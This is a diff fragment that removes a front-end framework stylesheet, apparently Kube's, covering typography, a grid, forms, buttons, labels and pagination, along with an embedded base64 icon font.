-  background-color: #0d0d0e; }
-
-.bg-inverted {
-  background-color: #fff; }
-
-.bg-error {
-  background-color: #f03c69; }
-
-.bg-success {
-  background-color: #35beb1; }
-
-.bg-warning {
-  background-color: #f7ba45; }
-
-.bg-focus {
-  background-color: #1c86f2; }
-
-.bg-aluminum {
-  background-color: #f8f8f8; }
-
-.bg-silver {
-  background-color: #e0e1e1; }
-
-.bg-lightgray {
-  background-color: #d4d4d4; }
-
-.bg-gray {
-  background-color: #bdbdbd; }
-
-.bg-midgray {
-  background-color: #676b72; }
-
-.bg-darkgray {
-  background-color: #313439; }
-
-.bg-highlight {
-  background-color: #edf2ff; }
-
-html,
-body {
-  font-size: 16px;
-  line-height: 24px; }
-
-body {
-  font-family: Arial, "Helvetica Neue", Helvetica, sans-serif;
-  color: #313439;
-  background-color: transparent; }
-
-a {
-  color: #3794de; }
-
-a:hover {
-  color: #f03c69; }
-
-h1.title, h1, h2, h3, h4, h5, h6 {
-  font-family: Arial, "Helvetica Neue", Helvetica, sans-serif;
-  font-weight: bold;
-  color: #0d0d0e;
-  text-rendering: optimizeLegibility;
-  margin-bottom: 16px; }
-
-h1.title {
-  font-size: 60px;
-  line-height: 64px;
-  margin-bottom: 8px; }
-
-h1,
-.h1 {
-  font-size: 48px;
-  line-height: 52px; }
-
-h2,
-.h2 {
-  font-size: 36px;
-  line-height: 40px; }
-
-h3,
-.h3 {
-  font-size: 24px;
-  line-height: 32px; }
-
-h4,
-.h4 {
-  font-size: 21px;
-  line-height: 32px; }
-
-h5,
-.h5 {
-  font-size: 18px;
-  line-height: 28px; }
-
-h6,
-.h6 {
-  font-size: 16px;
-  line-height: 24px; }
-
-h1 a, .h1 a,
-h2 a, .h2 a,
-h3 a, .h3 a,
-h4 a, .h4 a,
-h5 a, .h5 a,
-h6 a, .h6 a {
-  color: inherit; }
-
-p + h2,
-p + h3,
-p + h4,
-p + h5,
-p + h6,
-ul + h2,
-ul + h3,
-ul + h4,
-ul + h5,
-ul + h6,
-ol + h2,
-ol + h3,
-ol + h4,
-ol + h5,
-ol + h6,
-dl + h2,
-dl + h3,
-dl + h4,
-dl + h5,
-dl + h6,
-blockquote + h2,
-blockquote + h3,
-blockquote + h4,
-blockquote + h5,
-blockquote + h6,
-hr + h2,
-hr + h3,
-hr + h4,
-hr + h5,
-hr + h6,
-pre + h2,
-pre + h3,
-pre + h4,
-pre + h5,
-pre + h6,
-table + h2,
-table + h3,
-table + h4,
-table + h5,
-table + h6,
-form + h2,
-form + h3,
-form + h4,
-form + h5,
-form + h6,
-figure + h2,
-figure + h3,
-figure + h4,
-figure + h5,
-figure + h6 {
-  margin-top: 24px; }
-
-ul,
-ul ul,
-ul ol,
-ol,
-ol ul,
-ol ol {
-  margin: 0 0 0 24px; }
-
-ol ol li {
-  list-style-type: lower-alpha; }
-
-ol ol ol li {
-  list-style-type: lower-roman; }
-
-nav ul,
-nav ol {
-  margin: 0;
-  list-style: none; }
-  nav ul ul,
-  nav ul ol,
-  nav ol ul,
-  nav ol ol {
-    margin-left: 24px; }
-
-dl dt {
-  font-weight: bold; }
-
-dd {
-  margin-left: 24px; }
-
-p, blockquote, hr, pre, ol, ul, dl, table, fieldset, figure, address, form {
-  margin-bottom: 16px; }
-
-hr {
-  border: none;
-  border-bottom: 1px solid rgba(0, 0, 0, 0.1);
-  margin-top: -1px; }
-
-blockquote {
-  padding-left: 1rem;
-  border-left: 4px solid rgba(0, 0, 0, 0.1);
-  font-style: italic;
-  color: rgba(49, 52, 57, 0.65); }
-  blockquote p {
-    margin-bottom: .5rem; }
-
-time, cite, small, figcaption {
-  font-size: 87.5%; }
-
-cite {
-  opacity: .6; }
-
-abbr[title], dfn[title] {
-  border-bottom: 1px dotted rgba(0, 0, 0, 0.5);
-  cursor: help; }
-
-var {
-  font-size: 16px;
-  opacity: .6;
-  font-style: normal; }
-
-mark, code, samp, kbd {
-  position: relative;
-  top: -1px;
-  padding: 4px 4px 2px 4px;
-  display: inline-block;
-  line-height: 1;
-  color: rgba(49, 52, 57, 0.85); }
-
-code {
-  background: #e0e1e1; }
-
-mark {
-  background: #f7ba45; }
-
-samp {
-  color: #fff;
-  background: #1c86f2; }
-
-kbd {
-  border: 1px solid rgba(0, 0, 0, 0.1); }
-
-sub,
-sup {
-  font-size: x-small;
-  line-height: 0;
-  margin-left: 1rem/4;
-  position: relative; }
-
-sup {
-  top: 0; }
-
-sub {
-  bottom: 1px; }
-
-pre, code, samp, var, kbd {
-  font-family: Consolas, Monaco, "Courier New", monospace; }
-
-pre, code, samp, var, kbd, mark {
-  font-size: 87.5%; }
-
-pre,
-pre code {
-  background: #f8f8f8;
-  padding: 0;
-  top: 0;
-  display: block;
-  line-height: 20px;
-  color: rgba(49, 52, 57, 0.85);
-  overflow: none;
-  white-space: pre-wrap; }
-
-pre {
-  padding: 1rem; }
-
-figcaption {
-  opacity: .6; }
-
-figure figcaption {
-  position: relative;
-  top: -1rem/2; }
-
-figure pre {
-  background: none;
-  border: 1px solid rgba(0, 0, 0, 0.1);
-  border-radius: 4px; }
-
-figure .video-container,
-figure pre {
-  margin-bottom: 8px; }
-
-.text-left {
-  text-align: left; }
-
-.text-center {
-  text-align: center; }
-
-.text-right {
-  text-align: right; }
-
-ul.unstyled {
-  margin-left: 0; }
-
-ul.unstyled,
-ul.unstyled ul {
-  list-style: none; }
-
-.monospace {
-  font-family: Consolas, Monaco, "Courier New", monospace; }
-
-.upper {
-  text-transform: uppercase; }
-
-.lower {
-  text-transform: lowercase; }
-
-.italic {
-  font-style: italic !important; }
-
-.strong {
-  font-weight: bold !important; }
-
-.normal {
-  font-weight: normal !important; }
-
-.muted {
-  opacity: .55; }
-
-a.muted {
-  color: #0d0d0e; }
-
-a.muted:hover {
-  opacity: 1; }
-
-.black {
-  color: #0d0d0e; }
-
-.smaller {
-  font-size: 12px;
-  line-height: 20px; }
-
-.small {
-  font-size: 14px;
-  line-height: 20px; }
-
-.big {
-  font-size: 18px;
-  line-height: 28px; }
-
-.large {
-  font-size: 20px;
-  line-height: 32px; }
-
-.end {
-  margin-bottom: 0 !important; }
-
-.highlight {
-  background-color: #edf2ff; }
-
-.nowrap,
-.nowrap td {
-  white-space: nowrap; }
-
-@media (min-width: 768px) and (max-width: 1024px) {
-  .columns-2,
-  .columns-3,
-  .columns-4 {
-    column-gap: 24px; }
-  .columns-2 {
-    column-count: 2; }
-  .columns-3 {
-    column-count: 3; }
-  .columns-4 {
-    column-count: 4; } }
-
-.row {
-  display: flex;
-  flex-direction: row;
-  flex-wrap: wrap; }
-  @media (max-width: 768px) {
-    .row {
-      flex-direction: column;
-      flex-wrap: nowrap; } }
-  .row.gutters,
-  .row.gutters > .row {
-    margin-left: -2%; }
-    @media (max-width: 768px) {
-      .row.gutters,
-      .row.gutters > .row {
-        margin-left: 0; } }
-    .row.gutters > .col,
-    .row.gutters > .row > .col {
-      margin-left: 2%; }
-      @media (max-width: 768px) {
-        .row.gutters > .col,
-        .row.gutters > .row > .col {
-          margin-left: 0; } }
-  .row.around {
-    justify-content: space-around; }
-  .row.between {
-    justify-content: space-between; }
-  .row.auto .col {
-    flex-grow: 1; }
-
-.col-1 {
-  width: 8.33333%; }
-
-.offset-1 {
-  margin-left: 8.33333%; }
-
-.col-2 {
-  width: 16.66667%; }
-
-.offset-2 {
-  margin-left: 16.66667%; }
-
-.col-3 {
-  width: 25%; }
-
-.offset-3 {
-  margin-left: 25%; }
-
-.col-4 {
-  width: 33.33333%; }
-
-.offset-4 {
-  margin-left: 33.33333%; }
-
-.col-5 {
-  width: 41.66667%; }
-
-.offset-5 {
-  margin-left: 41.66667%; }
-
-.col-6 {
-  width: 50%; }
-
-.offset-6 {
-  margin-left: 50%; }
-
-.col-7 {
-  width: 58.33333%; }
-
-.offset-7 {
-  margin-left: 58.33333%; }
-
-.col-8 {
-  width: 66.66667%; }
-
-.offset-8 {
-  margin-left: 66.66667%; }
-
-.col-9 {
-  width: 75%; }
-
-.offset-9 {
-  margin-left: 75%; }
-
-.col-10 {
-  width: 83.33333%; }
-
-.offset-10 {
-  margin-left: 83.33333%; }
-
-.col-11 {
-  width: 91.66667%; }
-
-.offset-11 {
-  margin-left: 91.66667%; }
-
-.col-12 {
-  width: 100%; }
-
-.offset-12 {
-  margin-left: 100%; }
-
-.gutters > .col-1 {
-  width: calc(8.33333% - 2%); }
-
-.gutters > .offset-1 {
-  margin-left: calc(8.33333% + 2%) !important; }
-
-.gutters > .col-2 {
-  width: calc(16.66667% - 2%); }
-
-.gutters > .offset-2 {
-  margin-left: calc(16.66667% + 2%) !important; }
-
-.gutters > .col-3 {
-  width: calc(25% - 2%); }
-
-.gutters > .offset-3 {
-  margin-left: calc(25% + 2%) !important; }
-
-.gutters > .col-4 {
-  width: calc(33.33333% - 2%); }
-
-.gutters > .offset-4 {
-  margin-left: calc(33.33333% + 2%) !important; }
-
-.gutters > .col-5 {
-  width: calc(41.66667% - 2%); }
-
-.gutters > .offset-5 {
-  margin-left: calc(41.66667% + 2%) !important; }
-
-.gutters > .col-6 {
-  width: calc(50% - 2%); }
-
-.gutters > .offset-6 {
-  margin-left: calc(50% + 2%) !important; }
-
-.gutters > .col-7 {
-  width: calc(58.33333% - 2%); }
-
-.gutters > .offset-7 {
-  margin-left: calc(58.33333% + 2%) !important; }
-
-.gutters > .col-8 {
-  width: calc(66.66667% - 2%); }
-
-.gutters > .offset-8 {
-  margin-left: calc(66.66667% + 2%) !important; }
-
-.gutters > .col-9 {
-  width: calc(75% - 2%); }
-
-.gutters > .offset-9 {
-  margin-left: calc(75% + 2%) !important; }
-
-.gutters > .col-10 {
-  width: calc(83.33333% - 2%); }
-
-.gutters > .offset-10 {
-  margin-left: calc(83.33333% + 2%) !important; }
-
-.gutters > .col-11 {
-  width: calc(91.66667% - 2%); }
-
-.gutters > .offset-11 {
-  margin-left: calc(91.66667% + 2%) !important; }
-
-.gutters > .col-12 {
-  width: calc(100% - 2%); }
-
-.gutters > .offset-12 {
-  margin-left: calc(100% + 2%) !important; }
-
-@media (max-width: 768px) {
-  [class^='offset-'],
-  [class*=' offset-'] {
-    margin-left: 0; } }
-
-.first {
-  order: -1; }
-
-.last {
-  order: 1; }
-
-@media (max-width: 768px) {
-  .row .col {
-    margin-left: 0;
-    width: 100%; }
-  .row.gutters .col {
-    margin-bottom: 16px; }
-  .first-sm {
-    order: -1; }
-  .last-sm {
-    order: 1; } }
-
-table {
-  border-collapse: collapse;
-  border-spacing: 0;
-  max-width: 100%;
-  width: 100%;
-  empty-cells: show;
-  font-size: 15px;
-  line-height: 24px; }
-
-table caption {
-  text-align: left;
-  font-size: 14px;
-  font-weight: 500;
-  color: #676b72; }
-
-th {
-  text-align: left;
-  font-weight: 700;
-  vertical-align: bottom; }
-
-td {
-  vertical-align: top; }
-
-tr.align-middle td,
-td.align-middle {
-  vertical-align: middle; }
-
-th,
-td {
-  padding: 1rem 1rem;
-  border-bottom: 1px solid rgba(0, 0, 0, 0.05); }
-  th:first-child,
-  td:first-child {
-    padding-left: 0; }
-  th:last-child,
-  td:last-child {
-    padding-right: 0; }
-
-tfoot th,
-tfoot td {
-  color: rgba(49, 52, 57, 0.5); }
-
-table.bordered td,
-table.bordered th {
-  border: 1px solid rgba(0, 0, 0, 0.05); }
-
-table.striped tr:nth-child(odd) td {
-  background: #f8f8f8; }
-
-table.bordered td:first-child,
-table.bordered th:first-child,
-table.striped td:first-child,
-table.striped th:first-child {
-  padding-left: 1rem; }
-
-table.bordered td:last-child,
-table.bordered th:last-child,
-table.striped td:last-child,
-table.striped th:last-child {
-  padding-right: 1rem; }
-
-table.unstyled td,
-table.unstyled th {
-  border: none;
-  padding: 0; }
-
-fieldset {
-  font-family: inherit;
-  border: 1px solid rgba(0, 0, 0, 0.1);
-  padding: 2rem;
-  margin-bottom: 2rem;
-  margin-top: 2rem; }
-
-legend {
-  font-weight: bold;
-  font-size: 12px;
-  text-transform: uppercase;
-  padding: 0 1rem;
-  margin-left: -1rem;
-  top: 2px;
-  position: relative;
-  line-height: 0; }
-
-input,
-textarea,
-select {
-  display: block;
-  width: 100%;
-  font-family: inherit;
-  font-size: 15px;
-  height: 40px;
-  outline: none;
-  vertical-align: middle;
-  background-color: #fff;
-  border: 1px solid #d4d4d4;
-  border-radius: 3px;
-  box-shadow: none;
-  padding: 0 12px; }
-
-input.small,
-textarea.small,
-select.small {
-  height: 36px;
-  font-size: 13px;
-  padding: 0 12px;
-  border-radius: 3px; }
-
-input.big,
-textarea.big,
-select.big {
-  height: 48px;
-  font-size: 17px;
-  padding: 0 12px;
-  border-radius: 3px; }
-
-input:focus,
-textarea:focus,
-select:focus {
-  outline: none;
-  background-color: #fff;
-  border-color: #1c86f2;
-  box-shadow: 0 0 1px #1c86f2 inset; }
-
-input.error,
-textarea.error,
-select.error {
-  background-color: rgba(240, 60, 105, 0.1);
-  border: 1px solid #f583a0; }
-  input.error:focus,
-  textarea.error:focus,
-  select.error:focus {
-    border-color: #f03c69;
-    box-shadow: 0 0 1px #f03c69 inset; }
-
-input.success,
-textarea.success,
-select.success {
-  background-color: rgba(53, 190, 177, 0.1);
-  border: 1px solid #6ad5cb; }
-  input.success:focus,
-  textarea.success:focus,
-  select.success:focus {
-    border-color: #35beb1;
-    box-shadow: 0 0 1px #35beb1 inset; }
-
-input:disabled, input.disabled,
-textarea:disabled,
-textarea.disabled,
-select:disabled,
-select.disabled {
-  resize: none;
-  opacity: 0.6;
-  cursor: default;
-  font-style: italic;
-  color: rgba(0, 0, 0, 0.5); }
-
-select {
-  -webkit-appearance: none;
-  background-image: url('data:image/svg+xml;utf8,<svg xmlns="http://www.w3.org/2000/svg" width="9" height="12" viewBox="0 0 9 12"><path fill="#5e6c75" d="M0.722,4.823L-0.01,4.1,4.134-.01,4.866,0.716Zm7.555,0L9.01,4.1,4.866-.01l-0.732.726ZM0.722,7.177L-0.01,7.9,4.134,12.01l0.732-.726Zm7.555,0L9.01,7.9,4.866,12.01l-0.732-.726Z"/></svg>');
-  background-repeat: no-repeat;
-  background-position: right 1rem center; }
-
-select[multiple] {
-  background-image: none;
-  height: auto;
-  padding: .5rem .75rem; }
-
-textarea {
-  height: auto;
-  padding: 8px 12px;
-  line-height: 24px;
-  vertical-align: top; }
-
-input[type="file"] {
-  width: auto;
-  border: none;
-  padding: 0;
-  height: auto;
-  background: none;
-  box-shadow: none;
-  display: inline-block; }
-
-input[type="search"],
-input.search {
-  background-repeat: no-repeat;
-  background-position: 8px 53%;
-  background-image: url('data:image/svg+xml;utf8,<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><path fill="#000" fill-opacity="0.4" d="M14.891,14.39l-0.5.5a0.355,0.355,0,0,1-.5,0L9.526,10.529a5.3,5.3,0,1,1,2.106-4.212,5.268,5.268,0,0,1-1.1,3.21l4.362,4.362A0.354,0.354,0,0,1,14.891,14.39ZM6.316,2.418a3.9,3.9,0,1,0,3.9,3.9A3.9,3.9,0,0,0,6.316,2.418Z"/></svg>');
-  padding-left: 32px; }
-
-input[type="radio"],
-input[type="checkbox"] {
-  display: inline-block;
-  width: auto;
-  height: auto;
-  padding: 0; }
-
-label {
-  display: block;
-  color: #313439;
-  margin-bottom: 4px;
-  font-size: 15px; }
-  label.checkbox,
-  label .desc,
-  label .success,
-  label .error {
-    text-transform: none;
-    font-weight: normal; }
-  label.checkbox {
-    font-size: 16px;
-    line-height: 24px;
-    cursor: pointer;
-    color: inherit; }
-    label.checkbox input {
-      margin-top: 0; }
-
-.form-checkboxes label.checkbox {
-  display: inline-block;
-  margin-right: 16px; }
-
-.req {
-  position: relative;
-  top: 1px;
-  font-weight: bold;
-  color: #f03c69;
-  font-size: 110%; }
-
-.desc {
-  color: rgba(49, 52, 57, 0.5);
-  font-size: 12px;
-  line-height: 20px; }
-
-span.desc {
-  margin-left: 4px; }
-
-div.desc {
-  margin-top: 4px;
-  margin-bottom: -8px; }
-
-.form-buttons button,
-.form-buttons .button {
-  margin-right: 8px; }
-
-form,
-.form-item {
-  margin-bottom: 2rem; }
-
-.form > .form-item:last-child {
-  margin-bottom: 0; }
-
-.form .row:last-child .form-item {
-  margin-bottom: 0; }
-
-.form span.success,
-.form span.error {
-  font-size: 12px;
-  line-height: 20px;
-  margin-left: 4px; }
-
-.form-inline input,
-.form-inline textarea,
-.form-inline select {
-  display: inline-block;
-  width: auto; }
-
-.append,
-.prepend {
-  display: flex; }
-  .append input,
-  .prepend input {
-    flex: 1; }
-  .append .button,
-  .append span,
-  .prepend .button,
-  .prepend span {
-    flex-shrink: 0; }
-  .append span,
-  .prepend span {
-    display: flex;
-    flex-direction: column;
-    justify-content: center;
-    font-weight: normal;
-    border: 1px solid #d4d4d4;
-    background-color: #f8f8f8;
-    padding: 0 .875rem;
-    color: rgba(0, 0, 0, 0.5);
-    font-size: 12px;
-    white-space: nowrap; }
-
-.prepend input {
-  border-radius: 0 3px 3px 0; }
-
-.prepend .button {
-  margin-right: -1px;
-  border-radius: 3px 0 0 3px !important; }
-
-.prepend span {
-  border-right: none;
-  border-radius: 3px 0 0 3px; }
-
-.append input {
-  border-radius: 3px 0 0 3px; }
-
-.append .button {
-  margin-left: -1px;
-  border-radius: 0 3px 3px 0 !important; }
-
-.append span {
-  border-left: none;
-  border-radius: 0 3px 3px 0; }
-
-button,
-.button {
-  font-family: Arial, "Helvetica Neue", Helvetica, sans-serif;
-  font-size: 15px;
-  color: #fff;
-  background-color: #1c86f2;
-  border-radius: 3px;
-  min-height: 40px;
-  padding: 8px 20px;
-  font-weight: 500;
-  text-decoration: none;
-  cursor: pointer;
-  display: inline-block;
-  line-height: 20px;
-  border: 1px solid transparent;
-  vertical-align: middle;
-  -webkit-appearance: none; }
-  button i,
-  .button i {
-    position: relative;
-    top: 1px;
-    margin: 0 2px; }
-
-input[type="submit"] {
-  width: auto; }
-
-button:hover,
-.button:hover {
-  outline: none;
-  text-decoration: none;
-  color: #fff;
-  background-color: #4ca0f5; }
-
-.button:disabled,
-.button.disabled {
-  cursor: default;
-  font-style: normal;
-  color: rgba(255, 255, 255, 0.7);
-  background-color: rgba(28, 134, 242, 0.7); }
-
-.button.small {
-  font-size: 13px;
-  min-height: 36px;
-  padding: 6px 20px;
-  border-radius: 3px; }
-
-.button.big {
-  font-size: 17px;
-  min-height: 48px;
-  padding: 13px 24px;
-  border-radius: 3px; }
-
-.button.large {
-  font-size: 19px;
-  min-height: 56px;
-  padding: 20px 36px;
-  border-radius: 3px; }
-
-.button.outline {
-  background: none;
-  border-width: 2px;
-  border-color: #1c86f2;
-  color: #1c86f2; }
-  .button.outline:hover {
-    background: none;
-    color: rgba(28, 134, 242, 0.6);
-    border-color: rgba(28, 134, 242, 0.5); }
-  .button.outline:disabled, .button.outline.disabled {
-    background: none;
-    color: rgba(28, 134, 242, 0.7);
-    border-color: rgba(28, 134, 242, 0.5); }
-
-.button.inverted {
-  color: #000;
-  background-color: #fff; }
-  .button.inverted:hover {
-    color: #000;
-    background-color: white; }
-  .button.inverted:disabled, .button.inverted.disabled {
-    color: rgba(0, 0, 0, 0.7);
-    background-color: rgba(255, 255, 255, 0.7); }
-  .button.inverted.outline {
-    background: none;
-    color: #fff;
-    border-color: #fff; }
-    .button.inverted.outline:hover {
-      color: rgba(255, 255, 255, 0.6);
-      border-color: rgba(255, 255, 255, 0.5); }
-    .button.inverted.outline:disabled, .button.inverted.outline.disabled {
-      background: none;
-      color: rgba(255, 255, 255, 0.7);
-      border-color: rgba(255, 255, 255, 0.5); }
-  .button.inverted:hover {
-    opacity: .7; }
-
-.button.round {
-  border-radius: 56px; }
-
-.button.raised {
-  box-shadow: 0 1px 3px rgba(0, 0, 0, 0.3); }
-
-.button.upper {
-  text-transform: uppercase;
-  letter-spacing: .04em;
-  font-size: 13px; }
-  .button.upper.small {
-    font-size: 11px; }
-  .button.upper.big {
-    font-size: 13px; }
-  .button.upper.large {
-    font-size: 15px; }
-
-.button.secondary {
-  color: #fff;
-  background-color: #313439; }
-  .button.secondary:hover {
-    color: #fff;
-    background-color: #606670; }
-  .button.secondary:disabled, .button.secondary.disabled {
-    color: rgba(255, 255, 255, 0.7);
-    background-color: rgba(49, 52, 57, 0.7); }
-  .button.secondary.outline {
-    background: none;
-    color: #313439;
-    border-color: #313439; }
-    .button.secondary.outline:hover {
-      color: rgba(49, 52, 57, 0.6);
-      border-color: rgba(49, 52, 57, 0.5); }
-    .button.secondary.outline:disabled, .button.secondary.outline.disabled {
-      background: none;
-      color: rgba(49, 52, 57, 0.7);
-      border-color: rgba(49, 52, 57, 0.5); }
-
-.label {
-  display: inline-block;
-  font-size: 13px;
-  background: #e0e1e1;
-  line-height: 18px;
-  padding: 0 10px;
-  font-weight: 500;
-  color: #313439;
-  border: 1px solid transparent;
-  vertical-align: middle;
-  text-decoration: none;
-  border-radius: 4px; }
-  .label a,
-  .label a:hover {
-    color: inherit;
-    text-decoration: none; }
-
-.label.big {
-  font-size: 14px;
-  line-height: 24px;
-  padding: 0 12px; }
-
-.label.upper {
-  text-transform: uppercase;
-  font-size: 11px; }
-
-.label.outline {
-  background: none;
-  border-color: #bdbdbd; }
-
-.label.badge {
-  text-align: center;
-  border-radius: 64px;
-  padding: 0 6px; }
-  .label.badge.big {
-    padding: 0 8px; }
-
-.label.tag {
-  padding: 0;
-  background: none;
-  border: none;
-  text-transform: uppercase;
-  font-size: 11px; }
-  .label.tag.big {
-    font-size: 13px; }
-
-.label.success {
-  background: #35beb1;
-  color: #fff; }
-  .label.success.tag, .label.success.outline {
-    background: none;
-    border-color: #35beb1;
-    color: #35beb1; }
-
-.label.error {
-  background: #f03c69;
-  color: #fff; }
-  .label.error.tag, .label.error.outline {
-    background: none;
-    border-color: #f03c69;
-    color: #f03c69; }
-
-.label.warning {
-  background: #f7ba45;
-  color: #0d0d0e; }
-  .label.warning.tag, .label.warning.outline {
-    background: none;
-    border-color: #f7ba45;
-    color: #f7ba45; }
-
-.label.focus {
-  background: #1c86f2;
-  color: #fff; }
-  .label.focus.tag, .label.focus.outline {
-    background: none;
-    border-color: #1c86f2;
-    color: #1c86f2; }
-
-.label.black {
-  background: #0d0d0e;
-  color: #fff; }
-  .label.black.tag, .label.black.outline {
-    background: none;
-    border-color: #0d0d0e;
-    color: #0d0d0e; }
-
-.label.inverted {
-  background: #fff;
-  color: #0d0d0e; }
-  .label.inverted.tag, .label.inverted.outline {
-    background: none;
-    border-color: #fff;
-    color: #fff; }
-
-.breadcrumbs {
-  font-size: 14px;
-  margin-bottom: 24px; }
-  .breadcrumbs ul {
-    display: flex;
-    align-items: center; }
-  .breadcrumbs.push-center ul {
-    justify-content: center; }
-  .breadcrumbs span,
-  .breadcrumbs a {
-    font-style: normal;
-    padding: 0 10px;
-    display: inline-block;
-    white-space: nowrap; }
-  .breadcrumbs li:after {
-    display: inline-block;
-    content: '/';
-    color: rgba(0, 0, 0, 0.3); }
-  .breadcrumbs li:last-child:after {
-    display: none; }
-  .breadcrumbs li:first-child span,
-  .breadcrumbs li:first-child a {
-    padding-left: 0; }
-  .breadcrumbs li.active a {
-    color: #313439;
-    text-decoration: none;
-    cursor: text; }
-
-.pagination {
-  margin: 24px 0;
-  font-size: 14px; }
-  .pagination ul {
-    display: flex;
-    margin: 0; }
-  .pagination.align-center ul {
-    justify-content: center; }
-  .pagination span,
-  .pagination a {
-    border-radius: 3px;
-    display: inline-block;
-    padding: 8px 12px;
-    line-height: 1;
-    white-space: nowrap;
-    border: 1px solid transparent; }
-  .pagination a {
-    text-decoration: none;
-    color: #313439; }
-    .pagination a:hover {
-      color: rgba(0, 0, 0, 0.5);
-      border-color: #e0e1e1; }
-  .pagination span,
-  .pagination li.active a {
-    color: rgba(0, 0, 0, 0.5);
-    border-color: #e0e1e1;
-    cursor: text; }
-  .pagination.upper {
-    font-size: 12px; }
-
-.pager span {
-  line-height: 24px; }
-
-.pager span,
-.pager a {
-  padding-left: 16px;
-  padding-right: 16px;
-  border-radius: 64px;
-  border-color: rgba(0, 0, 0, 0.1); }
-
-.pager li {
-  flex-basis: 50%; }
-
-.pager li.next {
-  text-align: right; }
-
-.pager.align-center li {
-  flex-basis: auto;
-  margin-left: 4px;
-  margin-right: 4px; }
-
-.pager.flat span,
-.pager.flat a {
-  border: none;
-  display: block;
-  padding: 0; }
-
-.pager.flat a {
-  font-weight: bold; }
-  .pager.flat a:hover {
-    background: none;
-    text-decoration: underline; }
-
-@media (max-width: 768px) {
-  .pager.flat ul {
-    flex-direction: column; }
-  .pager.flat li {
-    flex-basis: 100%;
-    margin-bottom: 8px;
-    text-align: left; } }
-
-@font-face {
-  font-family: 'Kube';
-  src: url("data:application/x-font-ttf;charset=utf-8;base64,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") format("truetype");
-  font-weight: normal;
-  font-style: normal; }
-
-[class^="kube-"], [class*=" kube-"], .close, .caret {
-  /* use !important to prevent issues with browser extensions that change fonts */
-  font-family: 'Kube' !important;
-  speak: none;
-  font-style: normal;
-  font-weight: normal;
-  font-variant: normal;
-  text-transform: none;
-  line-height: 1;
-  /* Better Font Rendering =========== */
